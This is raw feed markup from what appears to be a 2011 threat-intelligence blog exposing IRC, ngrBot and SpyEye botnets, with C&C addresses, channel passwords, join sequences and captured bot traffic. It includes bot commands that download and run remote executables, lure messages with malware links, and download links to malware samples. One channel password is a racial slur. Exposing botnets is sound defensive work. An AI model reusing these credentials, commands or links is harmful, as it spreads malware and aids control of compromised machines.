#rjr RjR<br />PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) - Redirected 4 domain(s)<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.16.114<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3451417898394647195?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-54149869988013714272011-12-18T22:47:00.002+01:002011-12-31T17:36:16.933+01:00jayian.com(irc botnet hosted in United States Kenmore Sentris Network Llc)Resolved : [jayian.com] To [76.191.112.53]<br /><br />Remote Host Port Number<br />76.191.112.53 1866<br /><br />NICK n[USA|XP|COMPUTERNAME]qfilxzg<br />USER hh "" "lol" :hh<br />JOIN #!h!<br />PONG 422<br /><br />Now talking in #!h!<br />Topic On: [ #!h! ] [ ]<br />Topic By: [ xx ]<br /><br />UPDATE:<br />Remote Host Port Number<br />199.15.234.7 80<br />69.163.148.162 80<br />76.191.112.53 2087 PASS carmex<br /><br />PRIVMSG #!s! :[DNS]: Blocked 1325 domain(s) - Redirected 0 domain(s)<br />NICK n{US|XPa}ydumpja<br />USER ydumpja 0 0 :ydumpja<br />JOIN #!s! carmex<br />PRIVMSG #!s! :[MSN]: Updated MSN spread interval to "3"<br />PRIVMSG #!s! :[MSN]: Updated MSN spread message to ":P LOL http://www.bompesqueiro.com/album.php?usr637-id3d7l1-Photo81.JPG"<br />PRIVMSG #!s! :[HTTP]: Updated HTTP spread interval to "3"<br />PRIVMSG #!s! :[HTTP]: Updated HTTP spread message to ":O LOL http://www.bompesqueiro.com/album.php?usr929-id3c1k5-Photo37.JPG"<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/76.191.112.53<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5414986998801371427?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-26681685769507749652011-12-17T18:00:00.002+01:002011-12-17T18:53:55.427+01:00xxlaa.com(ngrBot hosted in Russian Federation Selectel Ltd)My estimation for this botnet size is 30-50k aproximatly<br /><br />Domains used to control bots:<br />xxlaa.com active<br />Sabukenke.com not active<br />Alufina.com not activ<br />xxlss.com not active<br />xxlcc.com not active<br /><br />Resolved : [xxlaa.com] To [31.186.102.170]<br /><br />C&C Server: 222.187.221.243:7777 PASS laekin0505x<br />Server Password: <br />Username: ynuvlog<br />Nickname: n{DE|XPa}ynuvlog<br />Channel: (Password: ) <br />Channeltopic: <br />C&C Server: 31.186.102.170:7777 PASS laekin0505x<br />Server Password: <br />Username: sechfqy<br />Nickname: n{DE|XPa}sechfqy<br />Channel: #totalrenovation2011 (Password: ngrBot) <br />JOIN #US<br />Channeltopic: :$sx $upx http://www.fatm.org.ar/images/Winsoft.exe 48b4b8d537ac8e40587f11014ed92308<br /><br />hosting infos:<br />http://whois.domaintools.com/31.186.102.170<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2668168576950774965?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-19141453369522560502011-12-16T23:54:00.000+01:002011-12-16T23:54:45.314+01:00188.138.84.90(ngrBot hosted in Germany Intergenia Ag)Remote Host Port Number<br />188.138.84.90 9996 PASS ..<br /><br />199.15.234.7 80<br /><br />NICK n{US|XPa}ehftjhj<br />USER ehftjhj 0 0 :ehftjhj<br />PONG :34405528<br />JOIN #Bots ngrBot<br />PRIVMSG #Bots :[HTTP]: Updated HTTP spread message to "http://www.twom-pc.com"<br /><br />Now talking in #Bots<br />Topic On: [ #Bots ] [ !http.set http://www.twom-pc.com ]<br />Topic By: [ Juicers2 ]<br />Modes On: [ #Bots ] [ +sntu ]<br />(Juicers2) !stats<br />({IL|2K3a}cortawb) [usb="0" msn="0" http="0" total="0"]<br />({IL|2K3a}cortawb) [ftp="0" pop="0" http="0" total="0"]<br />({UA|XPu}ygurita) [usb="0" msn="0" http="0" total="0"]<br />({UA|XPu}ygurita) [ftp="0" pop="0" http="0" total="0"]<br />(Juicers2) who are you?<br /><br />hosting infos:<br />http://whois.domaintools.com/188.138.84.90<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1914145336952256050?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-29395225975224679732011-12-13T15:26:00.003+01:002011-12-29T01:27:26.390+01:00elperro23.net(ngrBot hosted in United States Seattle Dme Hosting Llc)Domains used to control bots:<br />elperro23.net<br />elperro3.net<br /><br />Resolved : [elperro23.net] To [74.221.210.169]<br /><br />Remote Host Port Number<br />199.15.234.7 80<br />217.160.124.219 80<br />74.221.210.169 5236 PASS ROCKR<br /><br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :)"<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 20 domain(s)<br />NICK n{US|XPa}rvtvjgd<br />USER rvtvjgd 0 0 :rvtvjgd<br />JOIN #ROCK ngrBot<br />JOIN #rockspread<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"<br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) |"<br /><br /><br />Now talking in #ROCK<br />Topic On: [ #ROCK ] [ ,mdns http://www.anrodphoto.com/wp-content/plugins/do.txt | ,j #rockspread | ,up http://www.anrodphoto.com/wp-content/plugins/9upjmrlzz.exe 24A3AF8782C75ACC45C4BAA110EA6F70 ]<br />Topic By: [ rockstar ]<br />rockstar sets mode: +o rockstar<br /><br />Now talking in #rockspread<br />Topic On: [ #rockspread ] [ ,msn.int 5 | ,http.int 5 | ,msn.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) | ,http.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) ]<br />Topic By: [ rockstar ]<br /><br />UPDATE:<br />C&C Server: 199.119.205.77:5236<br />Server Password: <br />Username: bswicfv<br />Nickname: n{DE|XPa}bswicfv<br />Channel: #ROCK (Password: ngrBot) <br />Channeltopic: :,mdns http://imatchclub.com/_themes/main/new_age/css/domi.txt | ,up http://imatchclub.com/_themes/main/new_age/css/10upjmrlzz.exe 1B52EEAF196290FADE3A8C1AD62A8710 | ,j #rockspread<br /><br />UPDATE:<br />Remote Host Port Number<br />184.22.118.196 5236 PASS ROCKR<br /><br />NICK n{US|XPa}ghzgyxn<br />USER ghzgyxn 0 0 :ghzgyxn<br />JOIN #ROCK ngrBot<br />JOIN #rockspread<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 28 domain(s)<br /><br />UPDATE:<br />Remote Host Port Number<br />187.17.123.243 80<br />199.15.234.7 80<br />81.31.145.6 80<br />199.193.252.177 5236 PASS ROCKR<br /><br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)<br />PRIVMSG #ROCK :[d="http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0<br />NICK n{US|XPa}gukijqs<br />USER gukijqs 0 0 :gukijqs<br />JOIN #ROCK ngrBot<br />JOIN #rockspread<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |"<br />PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |"<br />PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"<br /><br /> The data identified by the following URLs was then requested from the remote web server:<br /> http://www.aprendemos.xpg.com.br/wp-content/plugins/updates/do.txt<br /> http://api.wipmania.com/<br /> http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe<br /><br /><br /><br /><br />hosting infos:<br />http://whois.domaintools.com/74.221.210.169<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2939522597522467973?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-20234051766143842302011-12-12T23:04:00.000+01:002011-12-12T23:04:35.082+01:00BlackIce Server(http Bot hosted in Germany Gunzenhausen Hetzner Online Ag)Bot Panel<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OAHNPp_MFI8/TuZ5assLi-I/AAAAAAAAAKI/M6gUljYdmFg/s1600/blackice.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-OAHNPp_MFI8/TuZ5assLi-I/AAAAAAAAAKI/M6gUljYdmFg/s320/blackice.png" width="320" /></a></div><br />exe file <br /><a href="http://www.multiupload.com/R1N90XPT49" target="_blank">Download</a><br /><a href="http://757380e2.seriousdeals.net/" target="_blank">Download </a><br /><br />exe connects here<br />keto.w2c.ru 92.241.169.250<br />http://92.241.169.250/index.php?action=add&a=7&u=---------&l=&p=---------&c=DELL-D3E62F7E26 (keto.w2c.ru)<br /><br />hosting infos:<br />http://whois.domaintools.com/92.241.169.250<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2023405176614384230?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-6750409900456666822011-12-12T21:09:00.000+01:002011-12-12T21:09:47.818+01:00paradoxnet.ru(SpyEye v1.3 hosted in Ukraine Lugansk Fop Opria Ruslan Dmitrievich)Now alot of idiots are using spyeye here is the example<br /><br />SpyEye Panels<br />http://sna.paradoxnet.ru/spy/gate.php<br />http://paradoxnet.ru/spy/gate.php<br /><br /><br /><br />SpyEye Directory<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-5T2Jny5uOg8/TuZY-_l5knI/AAAAAAAAAI4/OslBfJceEUo/s1600/paradoxnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-5T2Jny5uOg8/TuZY-_l5knI/AAAAAAAAAI4/OslBfJceEUo/s320/paradoxnet.png" width="320" /></a></div><br /><br />Back-connect server<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-F4Ecbp7ZMzg/TuZZoeaC2lI/AAAAAAAAAJA/_4_YwzrPgQ8/s1600/bc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-F4Ecbp7ZMzg/TuZZoeaC2lI/AAAAAAAAAJA/_4_YwzrPgQ8/s320/bc.png" width="320" /></a></div><br />SpyEye Collector v0.3.9<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Hq5dSB0rQuo/TuZaTCHxBhI/AAAAAAAAAJI/89FxDIl_k7o/s1600/sc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-Hq5dSB0rQuo/TuZaTCHxBhI/AAAAAAAAAJI/89FxDIl_k7o/s320/sc.png" width="320" /></a></div><br />SpyEye Collector v0.3.9 configuration file<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-HRlWH9aaLoc/TuZa1RF1lPI/AAAAAAAAAJQ/gelPvo7O_yg/s1600/sec.config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-HRlWH9aaLoc/TuZa1RF1lPI/AAAAAAAAAJQ/gelPvo7O_yg/s320/sec.config.png" width="320" /></a></div><br />SpyEye Collector v0.3.9 sql tables<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-daOJO1schPg/TuZbsS3DjBI/AAAAAAAAAJY/8HJa5Q2F9sw/s1600/tables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-daOJO1schPg/TuZbsS3DjBI/AAAAAAAAAJY/8HJa5Q2F9sw/s320/tables.png" width="320" /></a></div><br />Formgraber panel<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-iJiiH9rAWU4/TuZcOKLyI9I/AAAAAAAAAJg/wNuIYmr9YDw/s1600/frm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-iJiiH9rAWU4/TuZcOKLyI9I/AAAAAAAAAJg/wNuIYmr9YDw/s320/frm.png" width="320" /></a></div><br />SpyEye Gate Installer<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-WhWVUAgB8_Y/TuZc2nVVsCI/AAAAAAAAAJo/BbeqeXfbr1k/s1600/install.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-WhWVUAgB8_Y/TuZc2nVVsCI/AAAAAAAAAJo/BbeqeXfbr1k/s320/install.png" width="320" /></a></div><br />Picture1<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-41zOyOZGqVI/TuZeKQrpr4I/AAAAAAAAAJ4/NvgNdBUto5g/s1600/packspyeye.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-41zOyOZGqVI/TuZeKQrpr4I/AAAAAAAAAJ4/NvgNdBUto5g/s320/packspyeye.png" width="320" /></a></div><br /><br />Picture2<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-y1WewtguBWI/TuZdmbLCnZI/AAAAAAAAAJw/6s2t6SefrV0/s1600/gate-installer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-y1WewtguBWI/TuZdmbLCnZI/AAAAAAAAAJw/6s2t6SefrV0/s320/gate-installer.png" width="320" /></a></div><br />SpyEye Control Panel<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-QNz0ZyNAkyQ/TuZe403YVvI/AAAAAAAAAKA/F2ba0fEFD34/s1600/maincp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-QNz0ZyNAkyQ/TuZe403YVvI/AAAAAAAAAKA/F2ba0fEFD34/s320/maincp.png" width="320" /></a></div><br />u can also have the full SpyEye installer from this panel <br />the problem is can u use it ? lol<br /><br />hosting infos:<br />http://whois.domaintools.com/91.213.8.76<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-675040990045666682?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-49851198043047099032011-12-11T17:36:00.000+01:002011-12-11T17:36:25.393+01:00lookshit.info(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)Resolved : [lookshit.info] To [80.82.65.96]<br /><br />Remote Host Port Number<br />80.82.65.96 65485 PASS biology<br /><br />Local users: Current Local Users: 390 Max: 418<br />Global users: Current Global Users: 390 Max: 418<br /><br />USER bot 0 * : Merqy[UserName@COMPUTERNAME]<br />NICK [wXP|EN|53124|M]<br />JOIN #Merqy s3xy 89 bots inside<br />JOIN #Merqy.EN s3xy 37 bots inside<br /><br />hosting infos:<br />http://whois.domaintools.com/80.82.65.96<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4985119804304709903?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-83950666595361499032011-12-11T00:55:00.000+01:002011-12-11T00:55:29.727+01:0094mb malware samplesThis package have alot of irc bots,bankers,spreaders etc<br /><a href="http://1da2a89e.tinylinks.co/" target="_blank">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8395066659536149903?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-24873860122716324342011-12-10T22:24:00.000+01:002011-12-10T22:24:31.893+01:00208.77.223.114(irc botnet hosted in United States Arlington Texas Pulmonary & Critical Care Consultants Pa )Remote Host Port Number<br />208.77.223.114 2345<br /><br />NICK New[USA|00|P|46702]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-1537 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|46702] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/208.77.223.114<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2487386012271632434?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-49673844526023370692011-12-10T01:10:00.000+01:002011-12-10T01:10:39.542+01:0069.64.79.210(irc botnet hosted in United States Codero)Remote Host Port Number<br />69.64.79.210 6667 PASS \google_cache2.tmp<br /><br />NICK New[custom-XP-USA]763897<br />USER 7638 "" "TsGh" :7638<br />PONG :974C3BFC<br />JOIN #icry 9977<br />PONG :irc.foonet.com<br /><br />hosting infos:<br />http://whois.domaintools.com/69.64.79.210<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4967384452602337069?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-82832183139471551262011-12-09T17:31:00.000+01:002011-12-09T17:31:00.661+01:0077.79.13.207(irc botnet hosted in Lithuania Siauliai Splius Uab)Remote Host Port Number<br />62.219.11.91 80<br /><br />72.32.8.40 80<br /><br />77.79.13.207 1337 PASS aa<br /><br />NOTICE [CAN][XP][66567] :STAYALIVE<br />NICK [CAN][XP][66567]<br />USER Surreal 8 * :Endless<br />JOIN #modz aa<br /><br />hosting infos:<br />http://whois.domaintools.com/77.79.13.207<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8283218313947155126?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-41892967668464342272011-12-09T17:24:00.000+01:002011-12-09T17:24:56.684+01:0091.121.96.162(ngrBot hosted in France Ovh Systems)Remote Host Port Number<br />199.15.234.7 80<br /><br />91.121.96.162 6667 PASS fumete<br /><br />NICK n{US|XPa}jgwfngz<br />USER jgwfngz 0 0 :jgwfngz<br />JOIN #bote fumete<br /><br />hosting infos:<br />http://whois.domaintools.com/91.121.96.162<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4189296766846434227?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-43708319833641775462011-12-08T14:04:00.000+01:002011-12-08T14:04:19.601+01:0095.143.193.118(irc botnet hosted in Sweden Hudiksvall Serverconnect Sweden Ab)Remote Host Port Number<br />178.17.164.202 80<br />95.143.193.118 80<br /><br />NICK qeoieyjx<br />USER a<br />PONG :i.<br />NICK jldmoscu<br />USER x<br /><br />020501 . . :#00c<br />00000010 | 6431 6134 3038 2053 6572 7669 6365 2050 | d1a408 Service P<br />00000020 | 6163 6B20 320A 4A4F 494E 2023 2E33 3634 | ack 2.JOIN #.364<br />00000030 | 0A30 3230 3530 3120 2E20 2E20 3A23 3030 | .020501 . . :#00<br />00000040 | 6364 3161 3430 3820 5365 7276 6963 6520 | cd1a408 Service<br />00000050 | 5061 636B 2032 0A4A 4F49 4E20 232E 3336 | Pack 2.JOIN #.36<br />00000060 | 340A | 4.<br /><br /> * The data identified by the following URL was then requested from the remote web server:<br /> o http://vetvetcom.com/tr9.txt<br /><br />hosting infos:<br />http://whois.domaintools.com/95.143.193.118<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4370831983364177546?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-21256434446622218762011-12-08T13:47:00.000+01:002011-12-08T13:47:14.943+01:0031.210.114.150(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)Remote Host Port Number<br />199.15.234.7 80<br />31.210.114.150 6667 PASS KCA<br /><br />NICK A[US-XPC]zrkwbnf<br />USER zrkwbnf 0 0 :zrkwbnf<br />JOIN #KCA KCA<br />JOIN #X<br /><br />hosting infos:<br />http://whois.domaintools.com/31.210.114.150<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2125643444662221876?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-61516473894739800752011-12-07T23:52:00.000+01:002011-12-07T23:52:42.013+01:00213.155.7.33(ngrBot hosted in Ukraine Poltava Tehnologii Budushego Llc)Remote Host Port Number<br />199.15.234.7 80<br />213.155.7.33 2009 PASS ngrbot<br /><br />NICK n{US|XPa}jitkqnc<br />USER jitkqnc 0 0 :jitkqnc<br />JOIN #juaz ngrBot<br /><br />Now talking in #juaz<br />Topic On: [ #juaz ]<br />Topic By: [ o0o ]<br /><br />hosting infos:<br />http://whois.domaintools.com/213.155.7.33<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6151647389473980075?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-91714230663592506612011-12-07T21:33:00.002+01:002011-12-07T21:33:51.941+01:0031.186.102.180(ngrBot hosted in Russian Federation Selectel Ltd)Remote Host Port Number<br />199.15.234.7 80<br />31.186.102.180 1863 PASS ngrBot<br /><br />NICK n{US|XPa}kyhrsdo<br />USER kyhrsdo 0 0 :kyhrsdo<br />JOIN #IrcPeru PeruRulz!!<br /><br />hosting infos:<br />http://whois.domaintools.com/31.186.102.180<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9171423066359250661?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-5593773206995186752011-12-07T21:18:00.002+01:002011-12-07T21:18:51.144+01:0031.210.47.236(irc botnet hosted in Turkey Hosting Internet Hizmetleri Ltd Sti)Remote Host Port Number<br />31.210.47.236 6667<br /><br />NICK new[iRooT-XP-USA]465072<br />USER 4650 "" "TsGh" :4650<br />JOIN #abece WTF<br />PONG :HTTP1.4<br /><br />hosting infos:<br />http://whois.domaintools.com/31.210.47.236<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-559377320699518675?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-8981977814917145462011-12-07T20:34:00.004+01:002011-12-08T00:34:35.491+01:00xpozure12345.info(irc Aryan bot hosted in Germany Gunzenhausen Hetzner Online Ag)Resolved : [xpozure12345.info]To [178.63.122.253]<br /><br />Remote Host Port Number<br />178.63.122.253 6667 PASS none<br />199.15.234.7 80<br /><br />NICK New{US-XP-x86}8543563<br />USER 8543563 "" "8543563" :8543563<br />MODE New{US-XP-x86}8543563 +iMm<br />JOIN #Aryan none<br />PONG :XPOZURE.GOV<br /><br />hosting infos:<br />http://whois.domaintools.com/178.63.122.253<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-898197781491714546?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-2746465348023257142011-12-07T19:19:00.002+01:002011-12-07T19:19:38.709+01:00208.77.218.154(irc botnet hosted in United States Florida Webmaster Corp)Remote Host Port Number<br />208.77.218.154 2345<br /><br />NICK New[USA|00|P|29500]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-0409 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|29500] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/208.77.218.154<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-274646534802325714?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-87565289390805355972011-12-06T17:47:00.000+01:002011-12-06T17:47:14.727+01:00173.252.248.152(ngrBot hosted in United States Santa Clara Take 2 Hosting Inc)Remote Host Port Number<br />173.252.248.152 5236 PASS ROCKR<br />199.15.234.7 80<br />206.193.204.35 80<br /><br />NICK n{US|XPa}ltphyjg<br />USER ltphyjg 0 0 :ltphyjg<br />JOIN #ROCK ngrBot<br />PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 17 domain(s)<br /><br />Now talking in #ROCK<br />Topic On: [ #ROCK ] [ ,mdns http://www.alemanarts.com//wp-includes/js/doma.txt ]<br />Topic By: [ rockstar ]<br /><br />hosting infos:<br />http://whois.domaintools.com/173.252.248.152<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8756528939080535597?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-82016323816464622492011-12-06T12:24:00.000+01:002011-12-06T12:24:28.042+01:0046.166.144.145(irc botnet hosted in France Santrex Internet Services Ltd)Remote Host Port Number<br />216.146.38.70 80<br />72.233.89.200 80<br />46.166.144.145 2109<br /><br />NICK {iNF-00-USA-XP-COMP-5850}<br />JOIN #hold nigger<br />PONG Beast.net<br />USER blaze * 0 :COMP<br /><br />hosting infos:<br />http://whois.domaintools.com/46.166.144.145<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8201632381646462249?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-31535688515252226082011-12-06T12:20:00.000+01:002011-12-06T12:20:06.477+01:00scans.no-ip.org(irc botnet hosted in Chile Exe Ingenera)Remote Host Port Number<br />200.55.208.196 21161<br /><br />NICK raGe|lmLsfSBCBu<br />USER xxwiml "fo9.net" "rage" :xxwiml<br />JOIN #rage rage<br />PONG irc.priv8net.com<br /><br />hosting infos:<br />http://whois.domaintools.com/200.55.208.196<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3153568851525222608?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-45658265997557603132011-12-05T21:34:00.000+01:002011-12-05T21:34:32.416+01:0064.151.111.140(irc botnet hosted in United States Gogrid Llc)Remote Host Port Number<br />64.151.111.140 4042<br /><br />NICK new[USA|XP|COMPUTERNAME]pzpmjiu<br />USER xd "" "lol" :xd<br />JOIN #newbiz#<br /><br />Now talking in #newbiz#<br />Topic On: [ #newbiz# ] [ ]<br />Topic By: [ b ]<br />Modes On: [ #newbiz# ] [ +smntu ]<br /><br />hosting infos:<br />http://whois.domaintools.com/64.151.111.140<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4565826599755760313?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-60530861754162987412011-12-05T20:42:00.001+01:002011-12-05T20:47:58.691+01:0046.249.56.213(ngrBot hosted in Netherlands Amsterdam Serverius Holding B.v)Remote Host Port Number<br />199.15.234.7 80<br />46.249.56.213 8811 PASS ngrBot<br /><br />NICK n{US|XPa}ihsboxr<br />USER ihsboxr 